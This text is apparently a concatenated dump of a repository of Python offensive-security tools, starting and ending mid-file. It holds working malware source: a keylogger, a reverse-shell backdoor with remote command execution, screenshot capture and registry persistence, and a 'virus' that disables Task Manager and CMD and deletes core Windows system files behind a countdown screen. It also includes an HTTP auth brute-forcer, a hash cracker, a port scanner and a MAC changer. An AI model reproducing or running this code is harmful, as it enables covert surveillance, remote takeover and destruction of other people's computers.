print(Fore.RED + '[-] Wrong Password: ' + password) 44 | 45 | main() 46 | -------------------------------------------------------------------------------- /Msg-encoder-and-decoder/Readme.md: -------------------------------------------------------------------------------- 1 | # Msg-encoder-and-decoder (GUI) 2 | * It is using base64 encryption algo. 3 | 4 | # Let us see how it's works! 5 | 6 | * First Input : The first input is text which may me either encrypted or to be encrypted. 7 | * Second Input : the key may be either an Integer, Character or String. "The key is most important part of this program!!" 8 | * Third Input : 9 | * There are two cases in input : 1. For Encryption 2. For Decrption. 10 | * * For Encryption user may select either 'e' or 'E'. 11 | * * For Decrption user may select either 'd' or 'D'. 12 | * Forth TextField: the forth textfield shows the output of both Encryption and Decryption . 13 | * RESET Button resets all the textfields in program. 14 | * EXIT Button will Exit the program. 15 | 16 | # Encryption with Integer Key 17 | ![Screenshot 2022-04-29 223941](https://user-images.githubusercontent.com/78251168/165991800-cd538706-c9b8-4d41-9236-ae76cf122a79.png) 18 | 19 | # Decryption 20 | ![asdfasd](https://user-images.githubusercontent.com/78251168/165991806-80b6b320-93a2-4666-b212-478660f2ec5a.png) 21 | 22 | # Things to be noted: 23 | * While Decrypting the text, it should be encrypted with same algo otherwise it will throw error : - 24 | * * "UnicodeDecodeError: 'utf-8' codec can't decode byte 0xdb in position 4: invalid continuation byte" 25 | 26 | 27 | # Encryption with String Key 28 | ![Screenshot 2022-04-29 224236](https://user-images.githubusercontent.com/78251168/165991810-f6ccd460-ee74-4c08-bb80-90f6ede621d0.png) 29 | 30 | # Decryption 31 | 32 | ![Screenshot 2022-04-29 224303](https://user-images.githubusercontent.com/78251168/165991813-267245ce-21bd-414e-a6bd-e1c1c5494337.png) 33 | -------------------------------------------------------------------------------- /Flooder-Sniffer-Spoofer/macChanger.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | import optparse 3 | import re 4 | def get_arguments(): 5 | parser = optparse.OptionParser() 6 | parser.add_option("-i", "--interface", dest="interface", help="Interface to change its MAC") 7 | parser.add_option("-m", "--mac", dest="MAC", help="New Mac address") 8 | (options, arguments) = parser.parse_args() 9 | if not options.interface: 10 | parser.error("[-]Please specify an interface, use --help for more info") 11 | elif not options.MAC: 12 | parser.error("[-]Please specify a MAC, use --help for more info") 13 | return options 14 | def change_mac(interface, MAC): 15 | print("[+]Changing Mac address for", interface, "to", MAC) 16 | subprocess.call(["ifconfig", interface, "down"]) 17 | subprocess.call(["ifconfig", interface, "hw", "ether", MAC]) 18 | subprocess.call(["ifconfig", interface, "up"]) 19 | def get_current_mac(interface): 20 | ifconfig_result = subprocess.check_output(["ifconfig", interface]) 21 | mac_address_search_result = re.search(r"\w\w:\w\w:\w\w:\w\w:\w\w:\w\w", ifconfig_result) 22 | 23 | if mac_address_search_result: 24 | return mac_address_search_result.group(0) 25 | else: 26 | print("[-] Could not read MAC address.") 27 | 28 | 29 | 30 | options = get_arguments() 31 | 32 | current_mac = get_current_mac(options.interface) 33 | print("current MAC= " +str(current_mac)) 34 | change_mac(options.interface, options.MAC) 35 | current_mac = get_current_mac(options.interface) 36 | if current_mac == options.MAC: 37 | print("[+] MAC address was successfully changed to " +current_mac) 38 | else: 39 | print("[-] MAC address did not changed.") 40 | -------------------------------------------------------------------------------- /Scanner/advancedPortScanner.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Wrttien By: Sahar Hathiramani 3 | # Date: 01/07/2020 4 | 5 | from socket import * 6 | import optparse 7 | from threading import * 8 | 9 | def connectionScan(targetHost, targetPort): 10 | try: 11 | sock = socket(AF_INET, SOCK_STREAM) 12 | sock.connect((targetHost,targetPort)) 13 | print '[*] %d/tcp Open' % targetPort 14 | except: 15 | print '[-] %d/tcp Closed' % targetPort 16 | finally: 17 | sock.close() 18 | 19 | def portScan(targetHost, targetPorts): 20 | try: 21 | ip = gethostbyname(targetHost) 22 | except: 23 | print 'Unkown Host %s' %s (targetHost) 24 | 25 | try: 26 | targetName = gethostbyaddr(ip) 27 | print '[*] Scan Results For: ' + targetName; 28 | except: 29 | print '[*] Scan Results For: ' + ip 30 | 31 | setdefaulttimeout(1) 32 | 33 | for port in targetPorts: 34 | t = Thread(target=connectionScan, args=(targetHost, int(port))) 35 | t.start() 36 | 37 | 38 | def main(): 39 | parser = optparse.OptionParser('Usage: ' + 'Usage: ./advancerscanner.py -H -p ') 40 | parser.add_option('-H', dest='targetHost', type='string', help='Specify Target Host') 41 | parser.add_option('-p', dest='targetPorts', type='string', help='Specify Ports separated by commas') 42 | (options, args) = parser.parse_args() 43 | targetHost = options.targetHost 44 | targetPorts = str(options.targetPorts).split(',') 45 | 46 | if (targetHost == None) | (targetPorts[0] == None): 47 | print(parser.usage) 48 | exit(0) 49 | 50 | portScan(targetHost, targetPorts) 51 | 52 | if __name__ == '__main__': 53 | main() 54 | -------------------------------------------------------------------------------- /Reverse_Shell/keylogger.py: -------------------------------------------------------------------------------- 1 | import os 2 | from .keyboard import Listener 3 | import time 4 | import threading 5 | 6 | 7 | class Keylogger(): 8 | keys = [] 9 | count = 0 10 | flag = 0 11 | path = os.environ['appdata'] +'\\processmanager.txt' 12 | #path = 'processmanager.txt' 13 | 14 | def on_press(self, key): 15 | self.keys.append(key) 16 | self.count += 1 17 | 18 | if self.count >= 1: 19 | self.count = 0 20 | self.write_file(self.keys) 21 | self.keys = [] 22 | 23 | def read_logs(self): 24 | with open(self.path, 'rt') as f: 25 | return f.read() 26 | 27 | def write_file(self, keys): 28 | with open(self.path, 'a') as f: 29 | for key in keys: 30 | k = str(key).replace("'", "") 31 | if k.find('backspace') > 0: 32 | f.write(' Backspace ') 33 | elif k.find('enter') > 0: 34 | f.write('\n') 35 | elif k.find('shift') > 0: 36 | f.write(' Shift ') 37 | elif k.find('space') > 0: 38 | f.write(' ') 39 | elif k.find('caps_lock') > 0: 40 | f.write(' caps_lock ') 41 | elif k.find('Key'): 42 | f.write(k) 43 | 44 | def self_destruct(self): 45 | self.flag = 1 46 | listener.stop() 47 | os.remove(self.path) 48 | 49 | def start(self): 50 | global listener 51 | with Listener(on_press=self.on_press) as listener: 52 | listener.join() 53 | 54 | if __name__ == '__main__': 55 | keylog = Keylogger() 56 | t = threading.Thread(target=keylog.start) 57 | t.start() 58 | while keylog.flag != 1: 59 | time.sleep(10) 60 | logs = keylog.read_logs() 61 | print(logs) 62 | #keylog.self_destruct() 63 | t.join() 64 | -------------------------------------------------------------------------------- /Reverse_Shell/server.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import termcolor 3 | import json 4 | import os 5 | 6 | 7 | 8 | def reliable_recv(): 9 | data = '' 10 | while True: 11 | try: 12 | data = data + target.recv(1024).decode().rstrip() 13 | return json.loads(data) 14 | except ValueError: 15 | continue 16 | 17 | def reliable_send(data): 18 | jsondata = json.dumps(data) 19 | target.send(jsondata.encode()) 20 | 21 | def upload_file(file_name): 22 | f = open(file_name, 'rb') 23 | target.send(f.read()) 24 | 25 | def download_file(file_name): 26 | f = open(file_name, 'wb') 27 | target.settimeout(1) 28 | chunk = target.recv(1024) 29 | while chunk: 30 | f.write(chunk) 31 | try: 32 | chunk = target.recv(1024) 33 | except socket.timeout as e: 34 | break 35 | target.settimeout(None) 36 | f.close() 37 | 38 | 39 | def target_communication(): 40 | count = 0 41 | while True: 42 | command = input('* Shell~%s: ' % str(ip)) 43 | reliable_send(command) 44 | if command == 'quit': 45 | break 46 | elif command == 'clear': 47 | os.system('clear') 48 | elif command[:3] == 'cd ': 49 | pass 50 | elif command[:6] == 'upload': 51 | upload_file(command[7:]) 52 | elif command[:8] == 'download': 53 | download_file(command[9:]) 54 | elif command[:10] == 'screenshot': 55 | f = open('screenshot%d' % (count), 'wb') 56 | target.settimeout(3) 57 | chunk = target.recv(1024) 58 | while chunk: 59 | f.write(chunk) 60 | try: 61 | chunk = target.recv(1024) 62 | except socket.timeout as e: 63 | break 64 | target.settimeout(None) 65 | f.close() 66 | count += 1 67 | elif command == 'help': 68 | print(termcolor.colored('''\n 69 | quit --> Quit Session With The Target 70 | clear --> Clear The Screen 71 | cd *Directory Name* --> Changes Directory On Target System 72 | upload *file name* --> Upload File To The target Machine 73 | download *file name* --> Download File From Target Machine 74 | keylog_start --> Start The Keylogger 75 | keylog_dump --> Print Keystrokes That The Target Inputted 76 | keylog_stop --> Stop And Self Destruct Keylogger File 77 | persistence *RegName* *fileName* --> Create Persistence In Registry'''),'green') 78 | else: 79 | result = reliable_recv() 80 | print(result) 81 | 82 | 83 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 84 | sock.bind(('127.0.0.1', 5555)) 85 | print(termcolor.colored('[+] Listening For The Incoming Connections', 'green')) 86 | sock.listen(5) 87 | target, ip = sock.accept() 88 | print(termcolor.colored('[+] Target Connected From: ' + str(ip), 'green')) 89 | target_communication() 90 | -------------------------------------------------------------------------------- /Msg-encoder-and-decoder/Encoder-Decoder.py: -------------------------------------------------------------------------------- 1 | #importing mmodules 2 | 3 | from tkinter import * 4 | import base64 5 | 6 | # Base64 is a group of similar binary-to-text encoding schemes that represent 7 | # #binary data in an ASCII string format by translating it into 8 | # a radix-64 representation. 9 | 10 | # initialize window 11 | root = Tk() 12 | root.geometry('540x400') 13 | # size of Frame 14 | root.resizable(0, 0) 15 | 16 | # title of the window 17 | root.title("Message Encode and Decode") 18 | 19 | # label 20 | 21 | Label(root, text='ENCODE DECODE', font='Times 20 bold', justify='center').pack() 22 | # pack shows orientation of label , default is top in pack() 23 | Label(root, text='Open Source', font='arial 20 ', justify='center').pack(side=BOTTOM) 24 | 25 | # variables declaration 26 | 27 | Text = StringVar() 28 | private_key = StringVar() 29 | mode = StringVar() 30 | Result = StringVar() 31 | 32 | 33 | # Encode Method 34 | def Encode(key, message): 35 | enc = [] 36 | for i in range(len(message)): 37 | key_c = key[i % len(key)] 38 | enc.append(chr((ord(message[i]) + ord(key_c)) % 256)) 39 | 40 | return base64.urlsafe_b64encode("".join(enc).encode()).decode() 41 | 42 | 43 | # returns decoded text 44 | 45 | def Decode(key, message): 46 | dec = [] 47 | message = base64.urlsafe_b64decode(message).decode() 48 | for i in range(len(message)): 49 | key_c = key[i % len(key)] 50 | dec.append(chr((256 + ord(message[i]) - ord(key_c)) % 256)) 51 | 52 | return "".join(dec) 53 | 54 | 55 | def Mode(): 56 | if mode.get() == 'e' or mode.get() == 'E': 57 | Result.set(Encode(private_key.get(), Text.get())) 58 | elif mode.get() == 'd' or mode.get() == 'D': 59 | Result.set(Decode(private_key.get(), Text.get())) 60 | else: 61 | Result.set('Invalid Mode') 62 | 63 | 64 | def Exit(): 65 | root.destroy() 66 | 67 | 68 | def Reset(): 69 | Text.set("") 70 | private_key.set("") 71 | mode.set("") 72 | Result.set("") 73 | 74 | 75 | # Message 76 | Label(root, font='arial 12 ', text='MESSAGE').place(x=60, y=60) 77 | Entry(root, font='arial 10', textvariable=Text, bg='ghost white').place(x=300, y=60) 78 | 79 | # key 80 | Label(root, font='arial 12 ', text='KEY').place(x=60, y=90) 81 | Entry(root, font='arial 10', textvariable=private_key, bg='ghost white').place(x=300, y=90) 82 | 83 | # mode 84 | Label(root, font='arial 12 ', text='MODE (e-encode, d-decode)').place(x=60, y=120) 85 | Entry(root, font='arial 10', textvariable=mode, bg='ghost white').place(x=300, y=120) 86 | 87 | # result 88 | Entry(root, font='arial 14 ', textvariable=Result, bg='ghost white').place(x=300, y=150) 89 | 90 | # result button 91 | Button(root, font='arial 10 bold', text='RESULT', padx=2, bg='LimeGreen', command=Mode, bd=3).place(x=60, y=150) 92 | 93 | # reset button 94 | Button(root, font='arial 10 bold', text='RESET', width=10, command=Reset, bg='cyan', padx=2, bd=3).place(x=80, y=200) 95 | 96 | # exit button 97 | Button(root, font='arial 10 bold', text='EXIT', width=10, command=Exit, bg='OrangeRed', padx=2, pady=2, bd=3).place( 98 | x=300, y=200) 99 | 100 | # Infinite loop 101 | root.mainloop() 102 | -------------------------------------------------------------------------------- /WEB_Penetration_Testing/baseDigestAuth.py: -------------------------------------------------------------------------------- 1 | #/usr/bin/python 2 | 3 | import requests 4 | from threading import Thread 5 | import sys 6 | import time 7 | import getopt 8 | from requests.auth import HTTPDigestAuth 9 | 10 | global hit 11 | hit = "1" 12 | 13 | def banner(): 14 | print(''' -------------------- 15 | BASE OR DIGEST AUTH 16 | --------------------''') 17 | def usage(): 18 | print("Usage: -w -u -t -f -m ") 19 | print("Example: python3 baseDigestAuth.py -w http://randomsite.com -u admin -t 5 -f passwords.txt -m basic\n") 20 | 21 | 22 | class request_performer(Thread): 23 | def __init__(self, passwd, user, url, method): 24 | Thread.__init__(self) 25 | self.password = passwd.split("\n")[0] 26 | self.username = user 27 | self.url = url 28 | self.method = method 29 | print("-" + self.password + "-") 30 | 31 | def run(self): 32 | global hit 33 | 34 | if hit == "1": 35 | try: 36 | if self.method == "basic": 37 | r = requests.get(self.url, auth=(self.user, self.password)) 38 | elif self.method == "digest": 39 | r = requests.get(self.url, auth=HTTPDigestAuth(self.user, self.password)) 40 | 41 | if r.status_code == 200: 42 | hit = "0" 43 | print("[+] Password Found - " + self.password) 44 | sys.exit() 45 | else: 46 | print("[-] Not Valid Password: " + self.password) 47 | i[0] = i[0] - 1 48 | except Exception as e: 49 | print(e) 50 | 51 | def start(argv): 52 | banner() 53 | if len(sys.argv) < 5: 54 | usage() 55 | sys.exit() 56 | 57 | try: 58 | opts, args = getopt.getopt(argv, "u:w:f:m:t") 59 | except getopt.Getopterror: 60 | print("[-] Invalid Arguments") 61 | sys.exit() 62 | 63 | method = "" 64 | user = "" 65 | url = "" 66 | threads = 0 67 | for opt, arg in opts: 68 | if opt == '-u': 69 | user = arg 70 | elif opt == '-t': 71 | threads = arg 72 | elif opt == '-w': 73 | url = arg 74 | elif opt == '-f': 75 | dictionary = arg 76 | elif opt == '-m': 77 | method = arg 78 | 79 | try: 80 | f = open(dictionary, "r") 81 | passwords = f.readlines() 82 | except: 83 | print("[-] Error. File Does Not Exist") 84 | sys.exit() 85 | 86 | launchThreads(passwords, threads, user, url, method) 87 | 88 | def launchThreads(passwords, threads, user, url, method): 89 | global i 90 | i = [] 91 | i.append(0) 92 | while len(passwords): 93 | if hit == "1": 94 | try: 95 | if i[0] < int(threads): 96 | password = passwords.pop(0) 97 | i[0] = i[0] + 1 98 | thread = request_performer(password, user, url, method) 99 | thread.start() 100 | 101 | except KeyboardInterrupt: 102 | print("Program Interrupted") 103 | sys.exit() 104 | thread.join() 105 | 106 | if __name__ == "__main__": 107 | try: 108 | start(sys.argv[1:]) 109 | except KeyboardInterrupt: 110 | print("[-] Program Interrupted") 111 | -------------------------------------------------------------------------------- /Reverse_Shell/revbackdoor.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import json 3 | import subprocess 4 | import time 5 | import os 6 | import pyautogui 7 | import keylogger 8 | import threading 9 | import shutil 10 | import sys 11 | 12 | def reliable_send(data): 13 | jsondata = json.dumps(data) 14 | s.send(jsondata.encode()) 15 | 16 | def reliable_recv(): 17 | data = '' 18 | while True: 19 | try: 20 | data = data + s.recv(1024).decode().rstrip() 21 | return json.loads(data) 22 | except ValueError: 23 | continue 24 | 25 | def download_file(file_name): 26 | f = open(file_name, 'wb') 27 | s.settimeout(1) 28 | chunk = s.recv(1024) 29 | while chunk: 30 | f.write(chunk) 31 | try: 32 | chunk = s.recv(1024) 33 | except socket.timeout as e: 34 | break 35 | s.settimeout(None) 36 | f.close() 37 | 38 | def upload_file(file_name): 39 | f = open(file_name, 'rb') 40 | s.send(f.read()) 41 | 42 | def screenshot(): 43 | myScreenshot = pyautogui.screenshot() 44 | myScreenshot.save('screen.png') 45 | 46 | def persist(reg_name, copy_name): 47 | file_location = os.environ['appdata'] + '\\' + copy_name 48 | try: 49 | if not os.path.exists(file_location): 50 | shutil.copyfile(sys.executable, file_location) 51 | subprocess.call('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ' + reg_name + ' /t REG_SZ /d "' + file_location + '"', shell=True) 52 | reliable_send('[+] Created Persistence With Reg Key: ' + reg_name) 53 | else: 54 | reliable_send('[+] Persistence Already Exists') 55 | except: 56 | reliable_send('[+] Error Creating Persistence With The Target Machine') 57 | 58 | def connection(): 59 | while True: 60 | time.sleep(20) 61 | try: 62 | s.connect(('127.0.0.1', 5555)) 63 | shell() 64 | s.close() 65 | break 66 | except: 67 | connection() 68 | 69 | def shell(): 70 | while True: 71 | command = reliable_recv() 72 | if command == 'quit': 73 | break 74 | elif command == 'background': 75 | pass 76 | elif command == 'help': 77 | pass 78 | elif command == 'clear': 79 | pass 80 | elif command[:3] == 'cd ': 81 | os.chdir(command[3:]) 82 | elif command[:6] == 'upload': 83 | download_file(command[7:]) 84 | elif command[:8] == 'download': 85 | upload_file(command[9:]) 86 | elif command[:10] == 'screenshot': 87 | screenshot() 88 | upload_file('screen.png') 89 | os.remove('screen.png') 90 | elif command[:12] == 'keylog_start': 91 | keylog = keylogger.Keylogger() 92 | t = threading.Thread(target=keylog.start) 93 | t.start() 94 | reliable_send('[+] Keylogger Started!') 95 | elif command[:11] == 'keylog_dump': 96 | logs = keylog.read_logs() 97 | reliable_send(logs) 98 | elif command[:11] == 'keylog_stop': 99 | keylog.self_destruct() 100 | t.join() 101 | reliable_send('[+] Keylogger Stopped!') 102 | elif command[:11] == 'persistence': 103 | reg_name, copy_name = command[12:].split(' ') 104 | persist(reg_name, copy_name) 105 | elif command[:7] == 'sendall': 106 | subprocess.Popen(command[8:], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,stdin = subprocess.PIPE) 107 | else: 108 | execute = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,stdin=subprocess.PIPE) 109 | result = execute.stdout.read() + execute.stderr.read() 110 | result = result.decode() 111 | reliable_send(result) 112 | 113 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 114 | connection() 115 | 116 | -------------------------------------------------------------------------------- /Hash_Generator_And_Cracker/Hash_Cracker_Universal.py: -------------------------------------------------------------------------------- 1 | import hashlib,binascii 2 | hash_type=input("Enter the hash type\n1 md5\n2 sha1\n3 Sha224\n4 SHA256\n5 SHA512\n6 NTLM\n") 3 | path_to_wordlist = input ("Enter path to word list\n") 4 | input_hash=input("Enter the hash crack\n") 5 | def md5_crack(hash_to_crack,path_to_wordlist): 6 | c = 1 7 | with open (path_to_wordlist, encoding='utf-8') as file1: 8 | for line in file1: 9 | current_pass = line.replace('\n', '').rstrip() 10 | hash_current = hashlib.md5 (current_pass.encode('utf-8')).hexdigest() 11 | c += 1 12 | if c%100000 == 0: 13 | print (f"Done {c} passwords current{current_pass}") 14 | if hash_current == hash_to_crack: 15 | print (f"Password found ---> {current_pass}") 16 | break 17 | def sha1_crack(hash_to_crack,path_to_wordlist): 18 | c = 1 19 | with open (path_to_wordlist, encoding='utf-8') as file1: 20 | for line in file1: 21 | current_pass = line.replace('\n', '').rstrip() 22 | hash_current = hashlib.sha1(current_pass.encode('utf-8')).hexdigest() 23 | c += 1 24 | if c%100000 == 0: 25 | print (f"Done {c} passwords current{current_pass}") 26 | if hash_current == hash_to_crack: 27 | print (f"Password found ---> {current_pass}") 28 | break 29 | def sha224_crack(hash_to_crack,path_to_wordlist): 30 | c = 1 31 | with open (path_to_wordlist, encoding='utf-8') as file1: 32 | for line in file1: 33 | current_pass = line.replace('\n', '').rstrip() 34 | hash_current = hashlib.sha224(current_pass.encode('utf-8')).hexdigest() 35 | c += 1 36 | if c%100000 == 0: 37 | print (f"Done {c} passwords current{current_pass}") 38 | if hash_current == hash_to_crack: 39 | print (f"Password found ---> {current_pass}") 40 | break 41 | def sha256_crack(hash_to_crack,path_to_wordlist): 42 | c = 1 43 | with open (path_to_wordlist, encoding='utf-8') as file1: 44 | for line in file1: 45 | current_pass = line.replace('\n', '').rstrip() 46 | hash_current = hashlib.sha256(current_pass.encode('utf-8')).hexdigest() 47 | c += 1 48 | if c%100000 == 0: 49 | print (f"Done {c} passwords current{current_pass}") 50 | if hash_current == hash_to_crack: 51 | print (f"Password found ---> {current_pass}") 52 | break 53 | def sha512_crack(hash_to_crack,path_to_wordlist): 54 | c = 1 55 | with open (path_to_wordlist, encoding='utf-8') as file1: 56 | for line in file1: 57 | current_pass = line.replace('\n', '').rstrip() 58 | hash_current = hashlib.sha512(current_pass.encode('utf-8')).hexdigest() 59 | c += 1 60 | if c%100000 == 0: 61 | print (f"Done {c} passwords current{current_pass}") 62 | if hash_current == hash_to_crack: 63 | print (f"Password found ---> {current_pass}") 64 | break 65 | def NTLM_crack(hash_to_crack,path_to_wordlist): 66 | c = 1 67 | with open (path_to_wordlist, encoding='utf-8') as file1: 68 | for line in file1: 69 | current_pass = line.replace('\n', '').rstrip() 70 | hash_current = hashlib.NTLM(current_pass.encode('utf-8')).hexdigest() 71 | c += 1 72 | if c%100000 == 0: 73 | print (f"Done {c} passwords current{current_pass}") 74 | if hash_current == hash_to_crack: 75 | print (f"Password found ---> {current_pass}") 76 | break 77 | 78 | if hash_type =="1": 79 | md5_crack (input_hash, path_to_wordlist) 80 | if hash_type =="2": 81 | sha1_crack(input_hash, path_to_wordlist) 82 | if hash_type == "3": 83 | sha224_crack(input_hash, path_to_wordlist) 84 | if hash_type =="4": 85 | sha256_crack(input_hash, path_to_wordlist) 86 | if hash_type =="5": 87 | sha512_crack(input_hash, path_to_wordlist) 88 | if hash_type =="6": 89 | NTLM_crack(input_hash, path_to_wordlist) 90 | -------------------------------------------------------------------------------- /Virus/boss.py: -------------------------------------------------------------------------------- 1 | from tkinter import * 2 | import tkinter as tk 3 | import subprocess 4 | import sys 5 | import os 6 | import ctypes 7 | import threading 8 | import time 9 | 10 | 11 | 12 | def resource_path(relative_path): 13 | try: 14 | base_path = sys._MEIPASS 15 | except Exception: 16 | base_path = os.path.abspath(".") 17 | 18 | return os.path.join(base_path, relative_path) 19 | 20 | 21 | try: 22 | is_admin = os.getuid() == 0 23 | except AttributeError: 24 | is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0 25 | 26 | if is_admin == False: 27 | MessageBox = ctypes.windll.user32.MessageBoxW 28 | MessageBox(None, 'To enjoy this virus pls check admin-rights..', 'SAD', 0) 29 | sys.exit() 30 | 31 | 32 | def intr(cmd): 33 | try: 34 | from subprocess import DEVNULL 35 | except ImportError: 36 | DEVNULL = os.open(os.devnull, os.O_RDWR) 37 | 38 | output = subprocess.check_output(cmd, stdin=DEVNULL, stderr=DEVNULL, shell=True) 39 | return output 40 | 41 | 42 | def kill_windows(): 43 | intr('taskkill /f /im svchost.exe') 44 | intr('taskkill /f /im explorer.exe') 45 | intr('REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f') 46 | intr('REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f') 47 | intr('REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD /t REG_DWORD /d 1 /f') 48 | 49 | intr('takeown /f C:\Windows\System32\drivers\disk.sys && icacls C:\Windows\System32\drivers\disk.sys /grant %username%:F') 50 | intr('Takeown /f "C:\windows\system32\hal.dll"') 51 | intr('Takeown /f "C:\windows\system32\ci.dll"') 52 | intr('Takeown /f "C:\windows\system32\ntdll.dll"') 53 | intr('Takeown /f "C:\windows\system32\winload.exe"') 54 | intr('Takeown /f "C:\windows\system32\ntoskrnl.exe"') 55 | intr('Takeown /f "C:\windows\system32\winresume.exe"') 56 | 57 | intr('icacls "C:\windows\system32\ci.dll" /grant everyone:(F) /t /c') 58 | intr('icacls "C:\windows\system32\hal.dll" /grant everyone:(F) /t /c') 59 | intr('icacls "C:\windows\system32\ntdll.dll" /grant everyone:(F) /t /c') 60 | intr('icacls "C:\windows\system32\ntoskrnl.exe" /grant everyone:(F) /t /c') 61 | intr('icacls "C:\windows\system32\winload.exe" /grant everyone:(F) /t /c') 62 | intr('icacls "C:\windows\system32\winresume.exe" /grant everyone:(F) /t /c') 63 | 64 | intr('Del /f /a /q "C:\windows\system32\hal.dll"') 65 | intr('Del /f /a /q "C:\windows\system32\ci.dll"') 66 | intr('Del /f /a /q "C:\windows\system32\ntdll.dll"') 67 | intr('Del /f /a /q "C:\windows\system32\winload.exe"') 68 | intr('Del /f /a /q "C:\windows\system32\winresume.exe"') 69 | intr('Del /f /a /q "C:\windows\system32\ntoskrnl.exe"') 70 | intr('Del /f /a /q "%USERPROFILE%\desktop"') 71 | 72 | 73 | def disable_event(): 74 | pass 75 | 76 | 77 | def pull_gui(): 78 | root = tk.Tk() 79 | root.attributes("-fullscreen", True) 80 | title = Label(root, text='WELCOME TO Death 2.0 (HOPE YOUR PC IS DOING WELL)', font=('Terminal', 25), height=720, width=720, fg='red').pack() 81 | image = tk.PhotoImage(file=resource_path('images.jfif')) 82 | label = Label(root, image=image) 83 | label.place(anchor="center", x=650, y=200) 84 | 85 | i = Label(root, text='', fg='black', font=('Terminal', 13)) 86 | i.place(x=550, y=400) 87 | t = 30 88 | 89 | while t: 90 | mins, secs = divmod(t, 60) 91 | timer = '{:02d}:{:02d}'.format(mins, secs) 92 | time.sleep(1) 93 | t -= 1 94 | i['text'] = 'PC DEATH IN: ' + str(timer) 95 | root.update() 96 | 97 | intr('taskkill /IM wininit.exe /F') 98 | 99 | root.overrideredirect(True) 100 | root.protocol("WM_DELETE_WINDOW", disable_event) 101 | root.mainloop() 102 | 103 | if __name__ == "__main__": 104 | t1 = threading.Thread(target=kill_windows) 105 | t2 = threading.Thread(target=pull_gui) 106 | 107 | t1.start() 108 | t2.start() 109 | 110 | t1.join() 111 | t2.join() 112 | -------------------------------------------------------------------------------- /Network_Analyzer/packetAnalyzer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os,sys 5 | import struct 6 | import binascii 7 | 8 | socketCreated = False 9 | socketSniffer = 0 10 | 11 | def analyzeUDPHeader(dataRecv): 12 | udpHeader = struct.unpack('!4H', dataRecv[:8]) 13 | srcPort = udpHeader[0] 14 | dstPort = udpHeader[1] 15 | length = udpHeader[2] 16 | checksum = udpHeader[3] 17 | data = dataRecv[8:] 18 | 19 | print('---------- UDP HEADER ----------') 20 | print('Source Port: %hu' % srcPort) 21 | print('Destination Port: %hu' % dstPort) 22 | print('Length: %hu' % length) 23 | print('Checksum: %hu\n' % checksum) 24 | 25 | return data 26 | 27 | def analyzeTCPHeader(dataRecv): 28 | tcpHeader = struct.unpack('!2H2I4H', dataRecv[:20]) 29 | srcPort = tcpHeader[0] 30 | dstPort = tcpHeader[1] 31 | seqNum = tcpHeader[2] 32 | ackNum = tcpHeader[3] 33 | offset = tcpHeader[4] >> 12 34 | reserved = (tcpHeader[5] >> 6) & 0x03ff 35 | flags = tcpHeader[4] & 0x003f 36 | window = tcpHeader[5] 37 | checksum = tcpHeader[6] 38 | urgPtr = tcpHeader[7] 39 | data = dataRecv[20:] 40 | 41 | urg = bool(flags & 0x0020) 42 | ack = bool(flags & 0x0010) 43 | psh = bool(flags & 0x0008) 44 | rst = bool(flags & 0x0004) 45 | syn = bool(flags & 0x0002) 46 | fin = bool(flags % 0x0001) 47 | 48 | print('---------- TCP HEADER ----------') 49 | print('Source Port: %hu' % srcPort) 50 | print('Destination Port: %hu' % dstPort) 51 | print('Sequence Number: %u' % seqNum) 52 | print('Acknowledgement: %u' % ackNum) 53 | print('Flags: ') 54 | print(' URG: %d | ACK: %d | PSH: %d | RST: %d | SYN: %d | FIN: %d' % (urg, ack, psh, rst, syn, fin)) 55 | print('Window Size: %hu' % window) 56 | print('Checksum: %hu' % checksum) 57 | print('Urgent Pointer: %hu\n' % urgPtr) 58 | 59 | return data 60 | 61 | def analyzeIP(dataRecv): 62 | ipHeader = struct.unpack('!6H4s4s', dataRecv[:20]) 63 | version = ipHeader[0] >> 12 64 | ihl = (ipHeader[0] >> 8) & 0x0f 65 | tos = ipHeader[0] & 0x00ff 66 | totalLength = ipHeader[1] 67 | ipID = ipHeader[2] 68 | flags = ipHeader[3] >> 13 69 | fragOffset = ipHeader[3] & 0x1fff 70 | ipTTL = ipHeader[4] >> 8 71 | ipProtocol = ipHeader[4] & 0x00ff 72 | checksum = ipHeader[5] 73 | srcAddr = socket.inet_ntoa(ipHeader[6]) 74 | dstAddr = socket.inet_ntoa(ipHeader[7]) 75 | data = dataRecv[20:] 76 | 77 | print('---------- IP HEADER ----------') 78 | print('Version: %hu' % version) 79 | print('IHL: %hu' % ihl) 80 | print('TOS: %hu' % tos) 81 | print('Length: %hu' % totalLength) 82 | print('ID: %hu' % ipID) 83 | print('Offset: %hu' % fragOffset) 84 | print('TTL: %hu' % ipTTL) 85 | print('Protocol: %hu' % ipProtocol) 86 | print('Checksum: %hu' % checksum) 87 | print('Source IP: %s' % srcAddr) 88 | print('Destination IP: %s\n' % dstAddr) 89 | 90 | if ipProtocol == 6: 91 | tcp_udp = "TCP" 92 | elif ipProtocol == 17: 93 | tcp_udp = "UDP" 94 | else: 95 | tcp_udp = "Other" 96 | 97 | return data, tcp_udp 98 | 99 | 100 | def analyzeEtherHeader(dataRecv): 101 | ipBool = False 102 | etherHeader = struct.unpack('!6s6sH',dataRecv[:14]) 103 | dstMac = binascii.hexlify(etherHeader[0]).decode() 104 | srcMac = binascii.hexlify(etherHeader[1]).decode() 105 | protocol = etherHeader[2] >> 8 106 | data = dataRecv[14:] 107 | 108 | print('---------- ETHERNET HEADER -----------') 109 | print('Destination MAC: %s:%s:%s:%s:%s:%s' % (dstMac[0:2], dstMac[2:4], dstMac[4:6], dstMac[6:8], dstMac[8:10], dstMac[10:12])) 110 | print('Source MAC: %s:%s:%s:%s:%s:%s' % 